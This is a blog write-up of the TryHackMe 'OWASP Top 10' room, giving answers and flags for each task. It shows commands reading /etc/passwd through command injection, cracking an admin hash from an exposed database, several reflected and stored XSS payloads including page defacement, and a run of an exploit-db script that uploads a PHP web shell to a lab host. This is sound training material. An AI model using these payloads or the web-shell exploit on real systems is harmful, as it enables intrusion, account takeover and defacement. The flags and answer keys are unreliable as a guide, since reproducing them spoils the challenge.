DEV Community

Cover image for OWASP Top 10 - Write-up - TryHackMe
Frank Osasere Idugboe
Frank Osasere Idugboe

Posted on

OWASP Top 10 - Write-up - TryHackMe

Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
OWASP Top 10

Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1
$ sudo pacman -S exploitdb dbeaver python

Command Injection Practical#
What strange text file is in the website root directory?

Answer: drpepper.txt
Enter fullscreen mode Exit fullscreen mode

Issue the ls command to list files.

css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?

Answer: 0
Enter fullscreen mode Exit fullscreen mode

Issue the cat /etc/passwd command, it seems there is no non-root/non-service/non-daemon users.

1.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2.bin:x:2:2:bin:/bin:/usr/sbin/nologin
3.sys:x:3:3:sys:/dev:/usr/sbin/nologin
4.sync:x:4:65534:sync:/bin:/bin/sync
5.games:x:5:60:games:/usr/games:/usr/sbin/nologin
6.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
7.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
8.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
9.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
10.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
11.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
12.www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
13.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
14.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
15.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
16.gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin                 
17.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
18.systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
19.systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
20.syslog:x:102:106::/home/syslog:/usr/sbin/nologin
21.messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
22._apt:x:104:65534::/nonexistent:/usr/sbin/nologin
23.lxd:x:105:65534::/var/lib/lxd/:/bin/false
24.uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
25.dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
26.landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
27.pollinate:x:109:1::/var/cache/pollinate:/bin/false
28.sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Enter fullscreen mode Exit fullscreen mode

What user is this app running as?

Answer: www-data
Enter fullscreen mode Exit fullscreen mode

Issue the id command.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?

Answer: /usr/sbin/nologin
Enter fullscreen mode Exit fullscreen mode

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.

/usr/sbin/nologin

What version of Ubuntu is running?

Answer: 18.04.4
Enter fullscreen mode Exit fullscreen mode

Run cat /etc/os-release.

1.VERSION="18.04.4 LTS (Bionic Beaver)"
2.ID=ubuntu
3.ID_LIKE=debian
4.PRETTY_NAME="Ubuntu 18.04.4 LTS"
5.VERSION_ID="18.04"
6.HOME_URL="https://www.ubuntu.com/"
7.SUPPORT_URL="https://help.ubuntu.com/"
8.BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
9.PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
10.VERSION_CODENAME=bionic
11.UBUNTU_CODENAME=bionic
Enter fullscreen mode Exit fullscreen mode

Print out the MOTD. What favorite beverage is shown?

Answer: Dr pepper
Enter fullscreen mode Exit fullscreen mode
1.$ ls -1 /etc/update-motd.d/
2.10-help-text
3.50-landscape-sysinfo
4.50-motd-news
5.80-esm
6.80-livepatch
7.90-updates-available
8.91-release-upgrade
9.92-unattended-upgrades
10.95-hwe-eol
11.97-overlayroot
12.98-fsck-at-reboot
13.98-reboot-required
14.
15.$ cat /etc/update-motd.d/00-header
16.#
17.#    00-header - create the header of the MOTD
18.#    Copyright (C) 2009-2010 Canonical Ltd.
19.#
20.#    Authors: Dustin Kirkland <kirkland@canonical.com>
21.#
22.#    This program is free software; you can redistribute it and/or modify
23.#    it under the terms of the GNU General Public License as published by
24.#    the Free Software Foundation; either version 2 of the License, or
25.#    (at your option) any later version.
26.#
27.#    This program is distributed in the hope that it will be useful,
28.#    but WITHOUT ANY WARRANTY; without even the implied warranty of
29.#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
30.#    GNU General Public License for more details.
31.#
32.#    You should have received a copy of the GNU General Public License along
33.#    with this program; if not, write to the Free Software Foundation, Inc.,
34.#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
35.
36.[ -r /etc/lsb-release ] && . /etc/lsb-release
37.
38.if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
39. # Fall back to using the very slow lsb_release utility
40. DISTRIB_DESCRIPTION=$(lsb_release -s -d)
41.fi
42.
43.printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
44.
45.DR PEPPER MAKES THE WORLD TASTE BETTER!
Enter fullscreen mode Exit fullscreen mode

Broken Authentication Practical

What is the flag that you found in darren's account?

Register as darren and log in.

Answer: fe86079416a21a3c99937fea8874b667
Enter fullscreen mode Exit fullscreen mode

What is the flag that you found in arthur's account?

Register as arthur and log in.

Answer: d9ac0f7db4fda460ac3edeb75d75e16e
Enter fullscreen mode Exit fullscreen mode

Sensitive Data Exposure (Challenge)

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

What is the name of the mentioned directory?

Answer: /assets
Enter fullscreen mode Exit fullscreen mode

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: webapp.db
Enter fullscreen mode Exit fullscreen mode

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb
Enter fullscreen mode Exit fullscreen mode

Open the DB with dbeaver.

Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop
Enter fullscreen mode Exit fullscreen mode

Crack the password with crackstation.
Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
Enter fullscreen mode Exit fullscreen mode

XML External Entity - eXtensible Markup Language

Full form of XML

Answer: eXtensible Markup Language
Enter fullscreen mode Exit fullscreen mode

Is it compulsory to have XML prolog in XML documents?

Answer: yes
Enter fullscreen mode Exit fullscreen mode

Can we validate XML documents against a schema?

Answer: yes
Enter fullscreen mode Exit fullscreen mode

How can we specify XML version and encoding in XML document?

Answer: XML Prolog
Enter fullscreen mode Exit fullscreen mode

XML External Entity - DTD

How do you define a new ELEMENT?

Answer:!ELEMENT
Enter fullscreen mode Exit fullscreen mode

How do you define a ROOT element?

Answer:!DOCTYPE
Enter fullscreen mode Exit fullscreen mode

How do you define a new ENTITY?

Answer:!ENTITY
Enter fullscreen mode Exit fullscreen mode

XML External Entity - Exploiting

What is the name of the user in /etc/passwd

Answer: falcon
Enter fullscreen mode Exit fullscreen mode

Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa
Enter fullscreen mode Exit fullscreen mode

What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b
Enter fullscreen mode Exit fullscreen mode

Broken Access Control (IDOR Challenge)

Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}
Enter fullscreen mode Exit fullscreen mode

Security Misconfiguration

Hack into the webapp, and find the flag!

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}
Enter fullscreen mode Exit fullscreen mode

Cross-site Scripting

Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

Answer: ThereIsMoreToXSSThanYouThink
Enter fullscreen mode Exit fullscreen mode
<script>alert("Hello")</script>
Enter fullscreen mode Exit fullscreen mode

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

<script>alert(window.location.hostname)</script>
Enter fullscreen mode Exit fullscreen mode
Answer: ReflectiveXss4TheWin
Enter fullscreen mode Exit fullscreen mode

Now navigate to http://10.10.93.135/stored and make an account.

Then add a comment and see if you can insert some of your own HTML.

<b>noraj is bold</b>
Enter fullscreen mode Exit fullscreen mode
Answer: HTML_T4gs
Enter fullscreen mode Exit fullscreen mode

On the same page, create an alert popup box to appear on the page with your document cookies.

<script>alert(document.cookies)</script>
Enter fullscreen mode Exit fullscreen mode
Answer: W3LL_D0N3_LVL2s
Enter fullscreen mode Exit fullscreen mode

Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>
Enter fullscreen mode Exit fullscreen mode
Answer: websites_can_be_easily_defaced_with_xss
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization

Who developed the Tomcat application?

Answer: The Apache Software Foundation
Enter fullscreen mode Exit fullscreen mode

What type of attack that crashes services can be performed with insecure deserialization?

Answer: denial of service
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization - Objects

Select the correct term for the following statement:

Answer: A Behaviour
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

Answer: binary
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization - Cookies

If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?

Answer: webapp.com/login
Enter fullscreen mode Exit fullscreen mode

What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization - Cookies Practical

1st flag (cookie value)

Answer: THM{good_old_base64_huh}
Enter fullscreen mode Exit fullscreen mode
1.$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
2.}q(X    sessionIdqX c7dc44838e0847b1b45544948a92d194qX
                                                      3.encodedflagqXTHM{good_old_base64_huh}qu.
Enter fullscreen mode Exit fullscreen mode

2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}
Enter fullscreen mode Exit fullscreen mode

Insecure Deserialization - Remote Code Execution
flag.txt

Answer: 4a69a7ff9fd68
Enter fullscreen mode Exit fullscreen mode

Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: 1611
Enter fullscreen mode Exit fullscreen mode
1.$ searchsploit CSE bookstore
2.------------------------------------------------------------------------------------ ---------------------------------
3. Exploit Title                                                                      |  Path
4.------------------------------------------------------------------------------------ ---------------------------------
5.CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
6.CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
7.------------------------------------------------------------------------------------ ---------------------------------
8.Shellcodes: No Results
9.
10.$ searchsploit online book store
11.------------------------------------------------------------------------------------ ---------------------------------
12. Exploit Title                                                                      |  Path
13.------------------------------------------------------------------------------------ ---------------------------------
14.GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
15.Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
16.Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
17.Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
18.Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
19.------------------------------------------------------------------------------------ ---------------------------------
20.Shellcodes: No Results
21.
22.$ searchsploit -p 47887
23.  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
24.    URL: https://www.exploit-db.com/exploits/47887
25.     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
26.File Type: ASCII text, with CRLF line terminators
27.
28.$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
29.> Attempting to upload PHP web shell...
30.> Verifying shell upload...
31.> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
32.> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
33.> Do you wish to launch a shell here? (y/n): y
34.RCE $ wc -c /etc/passwd
35.1611 /etc/passwd
Enter fullscreen mode Exit fullscreen mode

Insufficient Logging and Monitoring

What IP address is the attacker using?

Answer: 49.99.13.16
Enter fullscreen mode Exit fullscreen mode

What kind of attack is being carried out?

Answer: brute force
Enter fullscreen mode Exit fullscreen mode

Top comments (0)